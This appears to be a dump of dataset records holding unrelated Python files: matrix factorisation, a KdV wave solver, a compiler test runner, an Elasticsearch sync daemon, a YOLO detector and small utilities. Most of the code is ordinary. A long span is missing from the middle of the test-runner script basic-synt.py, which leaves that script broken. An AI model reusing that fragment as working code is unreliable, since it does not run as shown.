columnNorms(W)\n for i in range(n):\n for j in range(p):\n W[i][j] = W[i][j]/column_norms[j]\n\ndef positiveMatrix(H, p, m):\n \"\"\"Transform matrix H(p,m) to be only positive.\n\n Parameters\n ----------\n H : float[][]\n p : int\n m : int\n \"\"\"\n for i in range(p):\n for j in range(m):\n H[i][j] = max(0, H[i][j])\n\n\ndef NMF(A, n, m, p):\n \"\"\"Calculates W and H, so that A(n,m) = W(n,p) * H(p,m).\n A should be a positive matrix.\n W and H are also positives.\n\n Parameters\n ----------\n A : float[][]\n n : int\n m : int\n p : int\n\n Returns\n ----------\n W : float[][]\n H : float[][]\n \"\"\"\n W = np.random.rand(n, p)\n H = np.zeros((p, m))\n\n epislon = 0.00001\n itmax = 100\n err_ant = squaredError(A, W, H)\n err = np.inf\n iterations = 0\n while abs(err-err_ant) > epislon and iterations < itmax:\n start_time = time.time()\n normalizeMatrix(W, n, p)\n \n start_time = time.time()\n H = solveMultipleLinear(deepcopy(W), n, m, p, deepcopy(A))\n print(\"solveMultipleLinear feita em %.3f segundos!\"%(time.time() - start_time))\n \n start_time = time.time()\n positiveMatrix(H, p, m)\n \n At = np.transpose(A)\n Ht = deepcopy(np.transpose(H))\n start_time = time.time()\n Wt = solveMultipleLinear(Ht, m, n, p, At)\n print(\"solveMultipleLinear transpose feita em %.3f segundos!\"%(time.time() - start_time))\n\n W = np.transpose(Wt)\n positiveMatrix(W, n, p)\n \n err_ant = err\n start_time = time.time()\n err = squaredError(A, W, H)\n iterations+=1\n print(iterations)\n print(abs(err-err_ant))\n return W, H\n\ndef readMatrix(filename, m):\n \"\"\"Reads a matrix from a file, then select only the first m columns.\n\n Parameters\n ----------\n filename : str\n m : int\n\n Returns\n ----------\n matrix : float[][]\n \"\"\"\n cols = []\n for i in range(m):\n cols.append(i)\n matrix = np.loadtxt(filename, usecols=cols)\n matrix = matrix/255\n return matrix","sub_path":"digit-classifier-master/Matrix.py","file_name":"Matrix.py","file_ext":"py","file_size_in_byte":6487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"418418286","text":"# KDV Equation + Time Discretization Using Runge-Kutta\n# u = u(x,t) velocity is a function of time and space\nfrom __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import hypsecant\n\n#==================================================================\n# Find the x values that we will be testing\n# Parameter is step size\n#==================================================================\n\ndef findx(h):\n x = []\n index = 0\n stepsize = int(1/h)\n for i in range(-10,10):\n i = float(i)\n x.append(i)\n for j in range(1,stepsize):\n index = index + h\n k = round((i + index), 2)\n x.append(k)\n index = 0\n x.append(10.0)\n return x\n\n#==================================================================\n# Find the t values that we will be testing\n# Parameter is step size\n#==================================================================\n\ndef findt(h):\n t = []\n index = 0\n stepsize = int(1/h)\n for i in range(0,2):\n i = float(i)\n t.append(i)\n for j in range(1,stepsize):\n index = index + h\n k = round((i + index), 2)\n t.append(k)\n index = 0\n t.append(2.0)\n return t\n\n#==================================================================\n# Initial Wave Function\n#==================================================================\n\ndef wavePosition(x):\n u = []\n for i in range(len(x)):\n temp = .5*((1/(np.cosh(.5*x[i])))**2)\n u.append(temp)\n return u\n\n#==================================================================\n# Actual Wave Function\n#==================================================================\n\ndef actualWavePosition(x,t):\n u = []\n for i in range(len(x)):\n temp = .5*((1/(np.cosh(.5*(x[i]-t))))**2)\n u.append(temp)\n return u\n\n#===============================================================================\n# KDV Equation (to model wave movement at next time interval)\n# Discretized the Ux variables\n#===============================================================================\n\ndef disUX(u,x):\n # the next position\n u_prime = []\n\n #step size\n size = len(x)-1\n #sections\n h = 20/(len(x))\n\n # for each element in u, we want to calculate the derivative with respect to x\n for i in range(len(x)):\n if i == 0:\n #first calculate the discretized element 6UU(sub-x)\n firstElement = -3*((((u[i+1])**2)-((u[(size-1)])**2))/(2*h))\n #second calculate the discretized element U(sub-xxx)\n secondElement = -((u[(i+2)])-(2*(u[(i+1)]))+(2*(u[(size-1)]))-(u[(size-2)]))/((2*h)**3)\n u_prime.append(firstElement + secondElement)\n elif i == 1:\n #first calculate the discretized element 6UU(sub-x)\n firstElement = -3*((((u[i+1])**2)-((u[(i-1)])**2))/(2*h))\n\n #second calculate the discretized element U(sub-xxx)\n secondElement = -((u[(i+2)])-(2*(u[(i+1)]))+(2*(u[(i-1)]))-(u[(size)]))/((2*h)**3)\n\n u_prime.append(firstElement+secondElement)\n elif i == size:\n #first calculate the discretized element 6UU(sub-x)\n firstElement = -3*((((u[1])**2)-((u[(size-1)])**2))/(2*h))\n\n #second calculate the discretized element U(sub-xxx)\n secondElement = -((u[(2)])-(2*(u[(1)]))+(2*(u[(i-1)]))-(u[(i-2)]))/((2*h)**3)\n\n u_prime.append(firstElement+secondElement)\n elif i == (size-1):\n #first calculate the discretized element 6UU(sub-x)\n firstElement = -3*((((u[i+1])**2)-((u[(i-1)])**2))/(2*h))\n\n #second calculate the discretized element U(sub-xxx)\n secondElement = -((u[(1)])-(2*(u[(i+1)]))+(2*(u[(i-1)]))-(u[(i-2)]))/((2*h)**3)\n\n u_prime.append(firstElement+secondElement)\n else:\n #first calculate the discretized element 6UU(sub-x)\n firstElement = -3*((((u[(i+1)])**2)-((u[(i-1)])**2))/(2*h))\n\n #second calculate the discretized element U(sub-xxx)\n secondElement = -((u[(i+2)])-(2*(u[(i+1)]))+(2*(u[(i-1)]))-(u[(i-2)]))/((2*h)**3)\n\n u_prime.append(firstElement+secondElement)\n #print u_prime\n return u_prime\n\n#===============================================================================\n# KDV Equation (to model wave movement at next time interval)\n# Discretized the Ut function\n#===============================================================================\n\ndef disUT(u,u_ux,x):\n #change in time varible hard coded as .01\n deltaT = .005\n\n #list to hold all solutions that are a result of the discretized Ut function\n u_prime = u_ux\n\n a = []\n b = []\n c = []\n d = []\n e = []\n\n for i in range(len(u)):\n k = u[i] + (deltaT*u_prime[i])\n a.append(k)\n \n b = disUX(a,x)\n\n for i in range(len(a)):\n k = (.75*u[i]) + (.25*a[i]) + (.25*deltaT*b[i])\n c.append(k)\n\n d = disUX(c,x)\n\n for i in range(len(c)):\n k = ((1/3)*u[i]) + ((2/3)*c[i]) + ((2/3)*deltaT*d[i])\n e.append(k)\n\n return e\n\n\n#===============================================================================\n# KDV Equation (to model wave movement at next time interval\n# U(sub-t) + 6UU(sub-x) + U(sub-xxx) = 0 \n# However, we will not be able to easily integrate this equation\n# So we will have to discretize the derivatives\n#===============================================================================\n\ndef kdv(u,x):\n u_ux = disUX(u,x)\n u_ut = disUT(u,u_ux,x)\n return u_ut\n\n#===============================================================================\n# Plot Points\n#===============================================================================\n\ndef plot(u,uActual,x):\n # X-Axis = x-values tested\n # Y-Axis = wave velocity or position\n\n plt.figure(figsize = (30,20))\n plt.subplot(3,1,1)\n plt.plot(x,u[0])\n plt.plot(x,uActual[0])\n plt.xlabel('time')\n plt.ylabel('velocity')\n plt.legend(('KDV.RK3','actual'))\n plt.title('Velocity plot at t=0')\n \n plt.subplot(3,1,2)\n plt.plot(x,u[50])\n plt.plot(x,uActual[50])\n plt.xlabel('time')\n plt.ylabel('velocity')\n plt.legend(('KDV.RK3','actual'))\n plt.title('Velocity plot at t = 100')\n \n plt.subplot(3,1,3)\n plt.plot(x,u[200]) \n plt.plot(x,uActual[200])\n plt.xlabel('time')\n plt.ylabel('velocity')\n plt.legend(('KDV.RK3','actual'))\n plt.title('Velocity plot at t= 200')\n plt.savefig('KDV_4.png')\n plt.show()\n\n \n return\n\n\n#==================================================================\n# Main Function (Initialize Variables and Call Functions)\n#==================================================================\n\ndef main():\n \"\"\"\n This function executes when this file is run as a script.\n \"\"\"\n\n #space (x), we will test an array of values for x\n # -10 to 10, step size will be passed to the function\n x_stepsize = 1\n x = findx(x_stepsize)\n #print x\n\n #time (t), we will test an array of values of t\n # 0 to 2, step size will be passed to the function\n t_stepsize = .01\n t = findt(t_stepsize)\n #print t\n\n\n #=========================================\n # Initial Condition (time = 0)\n # Call wavePosition Funciton\n #=========================================\n\n #velocity (u), we will use the wave function to find the initial velocity at each x-value\n uRecord = []\n uRecord.append(wavePosition(x))\n\n #=========================================\n # Call to KDV Function to get position at next time interval\n #=========================================\n\n temp = []\n temp2 = []\n\n for i in range(len(t)):\n if(i == 0):\n temp.append(uRecord[0])\n temp2 = uRecord[0]\n elif(i > 0):\n temp2 = kdv(temp2,x)\n temp.append(temp2)\n\n\n u = temp\n\n #=========================================\n # Find the Actual Solution\n #=========================================\n\n uActual = []\n for i in range(len(t)):\n uActual.append(actualWavePosition(x,t[i]))\n\n #===============================================================================\n # Call to plot function\n #===============================================================================\n\n plot(u,uActual,x)\n\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"KDV.py","file_name":"KDV.py","file_ext":"py","file_size_in_byte":8399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"149872396","text":"import os\nimport sys\nfrom threading import Thread\n\nos.chdir(\"../../../\")\n\nsyntaxPath = \"src/test/deca/syntax\"\nvalidFilesPath = \"src/test/deca/syntax/valid/our_tests\"\ninvalidFilesPath = \"src/test/deca/syntax/invalid/our_synt_tests\"\nvalidFileResultsPath = \"src/test/deca/syntax/valid/synt-results\"\ninvalidFileResultsPath = \"src/test/deca/syntax/invalid/synt-results\"\n\nlauncherPath = \"src/test/script/launchers\"\nscriptPath = \"src/test/script\"\n\ntestResultsPath = \"src/test/script/testResults\"\n\nisDebug = False\nisValid = False\nisInvalid = False\ncobertura = False\n\nnumPass = 0\nnumFail = 0\n\nfailedTests = []\n\nfor i in sys.argv:\n if (i == \"-v\"):\n isValid = True\n if (i == \"-i\"):\n isInvalid = True\n if (i == \"-d\"):\n isDebug = True\n if (i == \"-c\"):\n cobertura = True\n\nif (not(isDebug) and not(isInvalid) and not(isValid)):\n isValid = True\n isInvalid = True\n isDebug = True\n\n## re(create) testResults\n\nif (os.path.isdir(testResultsPath)):\n os.system(\"rm -rf \" + testResultsPath)\n os.system(\"mkdir \" + testResultsPath)\nelse:\n os.system(\"mkdir \" + testResultsPath)\n\n## create list of deca files to test\n\nvalidFiles = os.listdir(validFilesPath)\ninvalidFiles = os.listdir(invalidFilesPath)\n\ni=0\nwhile i \" + resultPath + \" 2>&1\")\n\n if (isDebug):\n\n if (os.system(\"diff -b \" + expectedResultPath + \" \" + resultPath)):\n results[index] = False\n print(\"###### FAIL: \" + testName + \" ######\")\n else:\n results[index] = True\n print(\"###### PASS: \" + testName + \" ######\")\n\n else:\n\n os.system(\"diff -b \" + expectedResultPath + \" \" + resultPath + \" > \" + testResultsPath + \"/\" + testName + \"_diff.txt\")\n \n if (os.path.getsize(testResultsPath + \"/\" + testName + \"_diff.txt\") == 0):\n results[index] = True\n else:\n results[index] = False\n\n\nif (isValid):\n results = [None] * len(validFiles)\n\n if (cobertura):\n for i in range(len(validFiles)):\n checkTest(True, validFiles[i], results, i)\n\n else:\n threads = [None] * len(validFiles)\n\n for i in range(len(validFiles)):\n threads[i] = Thread(target=checkTest, args=(True, validFiles[i], results, i))\n threads[i].start()\n\n for i in range(len(threads)):\n threads[i].join()\n \n for i in range(len(validFiles)):\n if results[i]:\n numPass += 1\n else:\n numFail += 1\n failedTests.append(validFiles[i])\n\nif (isInvalid):\n\n results = [None] * len(invalidFiles)\n\n if (cobertura):\n for i in range(len(invalidFiles)):\n checkTest(False, invalidFiles[i], results, i)\n\n else:\n threads = [None] * len(invalidFiles)\n\n for i in range(len(invalidFiles)):\n threads[i] = Thread(target=checkTest, args=(False, invalidFiles[i], results, i))\n threads[i].start()\n\n for i in range(len(threads)):\n threads[i].join()\n \n for i in range(len(invalidFiles)):\n if results[i]:\n numPass += 1\n else:\n numFail += 1\n failedTests.append(invalidFiles[i])\n\n\nprint(\"[SYNT] PASSED TESTS : \", numPass)\nprint(\"[SYNT] FAILED TESTS : \", numFail)\n\nif (not(isDebug)):\n\n print(\"[SYNT] THE FAILED TESTS ARE : \", failedTests)","sub_path":"src/test/script/basic-synt.py","file_name":"basic-synt.py","file_ext":"py","file_size_in_byte":4411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"628142428","text":"import psycopg2\nimport os\nimport sys\nimport logging as log\nimport time\n\nfrom aws_requests_auth.aws_auth import AWSRequestsAuth\nfrom elasticsearch import Elasticsearch, RequestsHttpConnection\nfrom elasticsearch.exceptions import AuthenticationException, \\\n AuthorizationException, NotFoundError\nfrom elasticsearch.exceptions \\\n import ConnectionError as ElasticsearchConnectionError\nfrom elasticsearch_dsl import Search, connections\nfrom elasticsearch import helpers\nfrom psycopg2.sql import SQL, Identifier\nfrom es_syncer.elasticsearch_models import database_table_to_elasticsearch_model\n\n\"\"\"\nA daemon for synchronizing database with Elasticsearch. For each table to\nsync, find its largest ID in database. Find the corresponding largest ID in\nElasticsearch. If the database ID is greater than the largest corresponding\nID in Elasticsearch, copy the missing records over to Elasticsearch.\n\nEach table is database corresponds to an identically named index in\nElasticsearch. For instance, if database has a table that we would like to\nreplicate called 'image', the syncer will create an Elasticsearch called\n'image' and populate the index with documents. See elasticsearch_models to \nchange the format of Elasticsearch documents.\n\nThis is intended to be daemonized and run by a process supervisor.\n\"\"\"\n\n# For AWS IAM access to Elasticsearch\nAWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')\nAWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')\nELASTICSEARCH_URL = os.environ.get('ELASTICSEARCH_URL')\nELASTICSEARCH_PORT = int(os.environ.get('ELASTICSEARCH_PORT', 9200))\nAWS_REGION = os.environ.get('AWS_REGION', 'us-east-1')\n\nDATABASE_HOST = os.environ.get('DATABASE_HOST')\nDATABASE_USER = os.environ.get('DATABASE_USER')\nDATABASE_PASSWORD = os.environ.get('DATABASE_PASSWORD')\nDATABASE_NAME = os.environ.get('DATABASE_NAME')\nDATABASE_PORT = int(os.environ.get('DATABASE_PORT', 5432))\n\n# The number of database records to load in memory at once.\nDB_BUFFER_SIZE = int(os.environ.get('DB_BUFFER_SIZE', 100000))\n\nSYNCER_POLL_INTERVAL = int(os.environ.get('SYNCER_POLL_INTERVAL', 60))\n\n# A comma separated list of tables in the database table to replicate to\n# Elasticsearch. Ex: image,docs\nREP_TABLES = os.environ.get('COPY_TABLES', 'image')\nreplicate_tables = REP_TABLES.split(',') if ',' in REP_TABLES else [REP_TABLES]\n\n\nclass ElasticsearchSyncer:\n def __init__(self, elasticsearch_instance, tables):\n self.es = elasticsearch_instance\n connections.connections.add_connection('default', self.es)\n self.tables_to_watch = tables\n\n def _synchronize(self):\n \"\"\"\n Check that the database tables are in sync with Elasticsearch. If not,\n begin replication.\n \"\"\"\n pg_conn = database_connect()\n\n for table in self.tables_to_watch:\n pg_conn.set_session(readonly=True)\n cur = pg_conn.cursor()\n # Find the last row added to the database table\n cur.execute(SQL('SELECT id FROM {} ORDER BY id DESC LIMIT 1;')\n .format(Identifier(table)))\n last_added_pg_id = cur.fetchone()[0]\n pg_conn.commit()\n cur.close()\n if not last_added_pg_id:\n log.warning('Tried to sync ' + table + ' but it was empty.')\n continue\n\n # Find the last document inserted into elasticsearch\n s = Search(using=self.es, index=table)\n s.aggs.bucket('highest_pg_id', 'max', field='id')\n try:\n es_res = s.execute()\n last_added_es_id = \\\n int(es_res.aggregations['highest_pg_id']['value'])\n except (TypeError, NotFoundError):\n log.info('No matching documents found in elasticsearch. '\n 'Replicating everything.')\n last_added_es_id = 0\n log.info('highest_db_id, highest_es_id: ' + str(last_added_pg_id) +\n ', ' + str(last_added_es_id))\n # Select all documents in-between and replicate to Elasticsearch.\n if last_added_pg_id > last_added_es_id:\n log.info('Replicating range ' + str(last_added_es_id) + '-' +\n str(last_added_pg_id))\n self._replicate(last_added_es_id, last_added_pg_id, table)\n pg_conn.close()\n\n def _replicate(self, start, end, table):\n \"\"\"\n Replicate all of the records between `start` and `end`.\n\n :param start: The first ID to replicate\n :param end: The last ID to replicate\n :param table: The table to replicate this range from.\n :return:\n \"\"\"\n cursor_name = table + '_table_cursor'\n # Enable writing to Postgres so we can create a server-side cursor.\n pg_conn = database_connect()\n with pg_conn.cursor(name=cursor_name) as server_cur:\n server_cur.itersize = DB_BUFFER_SIZE\n select_range = SQL(\n 'SELECT * FROM {}'\n ' WHERE id BETWEEN %s AND %s ORDER BY id')\\\n .format(Identifier(table))\n server_cur.execute(select_range, (start, end,))\n num_converted_documents = 0\n # Fetch a chunk and push it to Elasticsearch. Repeat until we run\n # out of chunks.\n while True:\n chunk = server_cur.fetchmany(server_cur.itersize)\n if not chunk:\n break\n es_batch = self.pg_chunk_to_es(chunk, server_cur.description,\n table)\n push_start_time = time.time()\n log.info('Pushing ' + str(len(es_batch)) +\n ' docs to Elasticsearch.')\n # Bulk upload to Elasticsearch in parallel.\n list(helpers.parallel_bulk(self.es, es_batch, chunk_size=400))\n\n log.info('Pushed in ' + str(time.time() - push_start_time) +\n 's.')\n num_converted_documents += len(chunk)\n log.info('Synchronized ' + str(num_converted_documents) + ' from '\n 'table \\'' + table + '\\' to Elasticsearch')\n pg_conn.commit()\n pg_conn.close()\n\n def listen(self, poll_interval=10):\n \"\"\"\n Poll the database for changes every poll_interval seconds.\n\n :arg poll_interval: The number of seconds to wait before polling the\n database for changes.\n \"\"\"\n while True:\n log.info('Listening for updates...')\n try:\n self._synchronize()\n except ElasticsearchConnectionError:\n self.es = elasticsearch_connect()\n\n time.sleep(poll_interval)\n\n @staticmethod\n def pg_chunk_to_es(pg_chunk, columns, origin_table):\n \"\"\"\n Given a list of psycopg2 results, convert them all to Elasticsearch\n documents.\n \"\"\"\n # Map column names to locations in the row tuple\n schema = {col[0]: idx for idx, col in enumerate(columns)}\n try:\n model = database_table_to_elasticsearch_model[origin_table]\n except KeyError:\n log.error(\n 'Table ' + origin_table +\n ' is not defined in elasticsearch_models.')\n return []\n\n documents = []\n for row in pg_chunk:\n converted = model.database_row_to_elasticsearch_doc(row, schema)\n converted = converted.to_dict(include_meta=True)\n documents.append(converted)\n\n return documents\n\n\ndef elasticsearch_connect(timeout=300):\n \"\"\"\n Repeatedly try to connect to Elasticsearch until successful.\n :return: An Elasticsearch connection object.\n \"\"\"\n while True:\n try:\n return _elasticsearch_connect(timeout)\n except ElasticsearchConnectionError as e:\n log.exception(e)\n log.error('Reconnecting to Elasticsearch in 5 seconds. . .')\n time.sleep(5)\n continue\n\n\ndef _elasticsearch_connect(timeout=300):\n \"\"\"\n Connect to configured Elasticsearch domain.\n\n :param timeout: How long to wait before ANY request to Elasticsearch times\n out. Because we use parallel bulk uploads (which sometimes wait long periods\n of time before beginning execution), a value of at least 30 seconds is\n recommended.\n :return: An Elasticsearch connection object.\n \"\"\"\n try:\n log.info('Trying to connect to Elasticsearch without authentication...')\n # Try to connect to Elasticsearch without credentials.\n es = Elasticsearch(\n host=ELASTICSEARCH_URL,\n port=ELASTICSEARCH_PORT,\n connection_class=RequestsHttpConnection,\n timeout=timeout,\n max_retries=10,\n wait_for_status='yellow'\n )\n log.info(str(es.info()))\n log.info('Connected to Elasticsearch without authentication.')\n except (AuthenticationException, AuthorizationException):\n # If that fails, supply AWS authentication object and try again.\n log.info(\n 'Connecting to %s %s with AWS auth', ELASTICSEARCH_URL,\n ELASTICSEARCH_PORT)\n auth = AWSRequestsAuth(\n aws_access_key=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY,\n aws_host=ELASTICSEARCH_URL,\n aws_region=AWS_REGION,\n aws_service='es'\n )\n auth.encode = lambda x: bytes(x.encode('utf-8'))\n es = Elasticsearch(\n host=ELASTICSEARCH_URL,\n port=ELASTICSEARCH_PORT,\n connection_class=RequestsHttpConnection,\n timeout=timeout,\n max_retries=10,\n retry_on_timeout=True,\n http_auth=auth,\n wait_for_status='yellow'\n )\n es.info()\n return es\n\n\ndef database_connect():\n \"\"\"\n Repeatedly try to connect to database until successful.\n :return: A database connection object\n \"\"\"\n while True:\n try:\n conn = psycopg2.connect(\n dbname=DATABASE_NAME,\n user=DATABASE_USER,\n password=DATABASE_PASSWORD,\n host=DATABASE_HOST,\n port=DATABASE_PORT,\n connect_timeout=5\n )\n except psycopg2.OperationalError as e:\n log.exception(e)\n log.error('Reconnecting to database in 5 seconds. . .')\n time.sleep(5)\n continue\n break\n\n return conn\n\n\nif __name__ == '__main__':\n fmt = \"%(asctime)s %(message)s\"\n log.basicConfig(stream=sys.stdout, level=log.INFO, format=fmt)\n log.getLogger(ElasticsearchSyncer.__name__).setLevel(log.DEBUG)\n log.info('Connecting to database')\n # Use readonly and autocommit to prevent polling from locking tables.\n log.info('Connecting to Elasticsearch')\n elasticsearch = elasticsearch_connect()\n syncer = ElasticsearchSyncer(elasticsearch, replicate_tables)\n log.info('Beginning synchronizer')\n syncer.listen(SYNCER_POLL_INTERVAL)\n","sub_path":"es_syncer/es_syncer/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":11074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"114160180","text":"import cv2\nimport os\nimport time\nimport numpy as np\nfrom imutils import face_utils\nimport imutils\n\n\ndef Gabor(frame):\n return cv2.filter2D(frame, cv2.CV_8UC3, cv2.getGaborKernel((25, 25), 0.1, 1 * np.pi / 2, 9.0, 0.6, 25, ktype=cv2.CV_32F))\n\ndef Clahe(frame):\n a = cv2.split(cv2.cvtColor(frame, cv2.COLOR_BGR2LAB))\n clahe = cv2.createCLAHE(clipLimit=4.5, tileGridSize=(7, 7))\n a[0] = clahe.apply(a[0])\n return cv2.cvtColor(cv2.merge(a), cv2.COLOR_LAB2BGR)\n\ndef main():\n \n net =cv2.dnn.readNet(\"YOLOFI2.weights\",\"YOLOFI.cfg\")\n cap = cv2.VideoCapture(\"test.mp4\")\n classes=[] \n l=1\n with open(\"obj.names\",\"r\")as f:\n classes = [line.strip()for line in f.readlines()]\n layers_names = net.getLayerNames()\n outputlayers= [layers_names[i[0]-1]for i in net.getUnconnectedOutLayers()]\n colors = np.random.uniform(0,255,size =(len(classes),3))\n font = cv2.FONT_HERSHEY_PLAIN\n frame_id=0 \n dd =-1\n time_now=time.time()\n frame_id=0\n err=0\n\n count = 0 # for counting frames\n\n while True:\n _, frame = cap.read()\n frame_id += 1 \n beltcornerdetected = False\n beltdetected = False \n height , width , channels = frame.shape\n\n\n frame = Gabor(frame)\n\n frame = Clahe(frame)\n #I'm using Gabor and Clache, because this is best solutions.\n\n blob = cv2.dnn.blobFromImage(frame, 0.00392, (480,480),(0,0,0),True,crop= False)\n net.setInput(blob)\n outs = net.forward(outputlayers)\n class_ids=[]\n boxes=[]\n shape=[]\n confidence=0\n\n for out in outs:\n\n for detection in out:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n \n if confidence> 0.2:\n center_x= int(detection[0] *width)\n center_y=int(detection[1]* height)\n w= int(detection[2] *width)\n h= int(detection[3] * height)\n x= int(center_x- w /2)\n y= int(center_y -h /2)\n cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),2)\n if class_id== 1:\n beltcornerdetected=True\n elif class_id == 0:\n beltdetected=True\n \n print(count, ' ', beltdetected)\n count+=1\n cv2.imshow(\"Image\",frame)\n key =cv2.waitKey(1)\n if key == 27:\n break\n \n cap.release() \n cv2.destroyAllWindows()\n \nif __name__ == '__main__':\n main()\n","sub_path":"BeltDetectionLab2/BeltDetectionLab2.py","file_name":"BeltDetectionLab2.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"117058819","text":"# -*- coding: utf-8 -*-\n\nfrom PyIMAQ import *\nimport numpy as np\nimport multiprocessing as mp\nfrom threading import Thread\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport time\nmatplotlib.use('TkAgg')\n\n# -----------------------------------------------------------------------------\n\ncamera_name = \"img0\"\nbuffer_size = 24\n\n# -----------------------------------------------------------------------------\n\nprint(\"Frame grab demo from camera\",camera_name,\"...\")\n\n# Open the camera interface\nprint(\"imgOpen\")\nimgShowErrorMsg(imgOpen('img0'))\n\n\n# Initialize a ring buffer w/ [buffer_size] buffers\nprint(\"imgInitBuffers... \",buffer_size,\"buffers in ring...\")\nimgShowErrorMsg(imgInitBuffer(buffer_size))\n\n# Start camera acquisition\nprint(\"imgStartAcq\")\nimgShowErrorMsg(imgStartAcq())\n\ntime.sleep(5)\n\nprint(imgGetBufferSize(),\"bytes/frame...\")\n\nfqueue = mp.Queue(buffer_size)\n\nplt.figure(1)\nplt.ion()\nline, = plt.plot([])\nplt.xlim([0, 2048])\nplt.ylim([0, 200])\nplt.show()\n\nwhile True:\n \n start = time.time()\n \n fbuff = np.empty(imgGetFrameSize(),dtype=np.uint16)\n \n imgGetCurrentFrame(fbuff,np.empty(1,dtype=np.int))\n \n f = fbuff[2048*100:2048*101]\n del fbuff \n print(str(1000 / (time.time() - start))[0:6],\"hz\")\n print(imgGetDroppedFrames(),\"dropped frames\")\n \n plt.pause(0.001)\n line.set_ydata(f)\n line.set_xdata(range(len(f)))\n \n plt.draw() \n\nplt.close()\n\nprint(\"imgAbortAcq\")\nimgShowErrorMsg(imgAbortAcq())\n\nprint(\"imgClose\")\nimgShowErrorMsg(imgClose())\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"457108900","text":"from django.shortcuts import render\nfrom django.views.generic.list import ListView\n\nfrom lrapp.rango.models import Category, Page\nfrom lrapp.account.decorators import add_fav_to_dict\n\n\n@add_fav_to_dict\ndef index(request, **kwargs):\n category_list = Category.objects.order_by('-likes')[:8]\n page_list = Page.objects.order_by('-likes')[:8]\n kwargs['categories'] = category_list\n kwargs['pages'] = page_list\n return render(request, 'topic/index.html', kwargs)\n\n\ndef about(request):\n return render(request, 'topic/about.html')\n\n\ndef get_category_list(max_results=0, starts_with=''):\n category_list = []\n if starts_with:\n category_list = Category.objects.filter(name__istartswith=starts_with)\n if category_list and max_results > 0:\n if category_list.count > max_results:\n category_list = category_list[:max_results]\n return category_list\n\n\ndef suggest_category(request):\n starts_with = ''\n if request.method == 'GET':\n starts_with = request.GET['suggestion']\n category_list = get_category_list(8, starts_with)\n return render(request, 'cats.html', {'categories': category_list})\n\n\nclass CategoryList(ListView):\n model = Category\n context_object_name = 'categories'\n template_name = 'topic/all_categories.html'\n paginate_by = 3\n\n def get_queryset(self):\n try:\n a = self.request.GET.get('category',)\n except KeyError:\n a = None\n\n if a:\n category_list = Category.objects.filter(name__icontains=a)\n else:\n category_list = Category.objects.all()\n\n return category_list\n\n\nclass PageList(ListView):\n model = Page\n paginate_by = 3\n template_name = 'topic/all_pages.html'\n context_object_name = 'pages'\n\n def get_queryset(self):\n try:\n a = self.request.GET.get('page_title',)\n except KeyError:\n a = None\n if a:\n page_list = Page.objects.filter(title__icontains=a)\n else:\n page_list = Page.objects.all()\n return page_list\n\n","sub_path":"lrapp/topic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"423291212","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport shelve\nimport threading\n\nfrom core import Checkip, HSM, Certificate, Subsystem, MFPInst\n\nclass Daemonize_it(threading.Thread):\n def __init__(self, item):\n threading.Thread.__init__(self)\n self.item = item\n\n def run(self):\n self.item.monitor()\n\n\nclass Host(object):\n def __init__(self):\n super(Host, self).__init__()\n\n self._attrs = [\n 'checkip',\n 'hsm',\n 'certificate',\n 'subsystem',\n 'mfp']\n\n def __getattr__(self, app):\n if self.__dict__ == {}:\n return super(Host, self).__getattr__(app)\n if app in self._attrs:\n if app == 'checkip':\n value = [item for item in Checkip()]\n elif app == 'hsm':\n value = [item for item in HSM()]\n elif app == 'certificate':\n value = [item for item in Certificate()]\n elif app == 'subsystem':\n value = [item for item in Subsystem()]\n elif app == 'mfp':\n value = [item for item in MFPInst()]\n else:\n return super(Host, self).__getattr__(app)\n\n setattr(self, app, value)\n return value\n else:\n raise AttributeError('%s is not defined' % app)\n\n def run_forever(self, once=False):\n apps = [\n 'checkip',\n 'hsm',\n 'certificate',\n 'subsystem',\n 'mfp' ]\n\n for app in apps:\n for item in getattr(self, app):\n Daemonize_it(item).start()\n\n\nif __name__ == '__main__':\n host = Host()\n host.run_forever()\n","sub_path":"swiftsystem/monitor_server.py","file_name":"monitor_server.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"405836110","text":"#import socket module\nfrom socket import *\nimport sys # In order to terminate the program\n\nc = socket(AF_INET, SOCK_STREAM)\nc.connect((sys.argv[1], int(sys.argv[2])))\nc.send((\"GET /\" + sys.argv[3] + \" HTTP/1.1\\r\\n\\r\\n\").encode())\nd = c.recv(1024)\nout = \"\"\nwhile d:\n out += d.decode()\n d = c.recv(1024)\n \nprint(out)\nc.close()\n","sub_path":"a1/test/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"591238186","text":"import matplotlib.pyplot as plt \nimport numpy as np\nfrom torch_geometric.data import Data\nimport torch \nfrom sklearn.metrics import mean_squared_error\nimport scvelo as scv \nimport scanpy as sc\nimport anndata\nfrom scipy.sparse import csr_matrix\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, Normalizer\nfrom sklearn.decomposition import PCA\nfrom sklearn.pipeline 